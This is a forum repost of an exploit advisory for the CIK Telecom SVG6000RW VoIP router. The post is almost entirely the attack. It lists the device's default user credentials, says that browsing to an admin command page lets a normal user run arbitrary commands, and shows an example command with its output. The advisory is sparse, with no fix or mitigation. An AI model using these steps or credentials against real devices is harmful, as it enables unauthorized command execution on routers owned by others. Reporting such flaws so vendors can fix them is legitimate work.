Aerosol Posted December 17, 2014 Report Posted December 17, 2014 ###################################################################### Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution# Date: 2014/12/10# Exploit Author: Chako# Vendor Homepage: https://www.ciktel.com/#####################################################################Description: CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie and can lead to Command Execution.Exploit:1) Login as a normal user Default Username: User Password:cikvoip2) change URL to http://URL/adm/system_command.asp and now u can run commands.Example:Command: ls /etc_rw/webResult:internetcgi-binhomemode_conf.aspmenu-en.swfwirelessmd5.jshotelmode_conf.aspwaitAndReboot.aspgraphicsmenu.swfgetMac.aspquickconfig.aspjavascriptfirewallhome.aspcustomermode_conf.aspwait.aspstationlogin.aspmain.cssoverview.aspstylevoiplangwpsusbadmSource Quote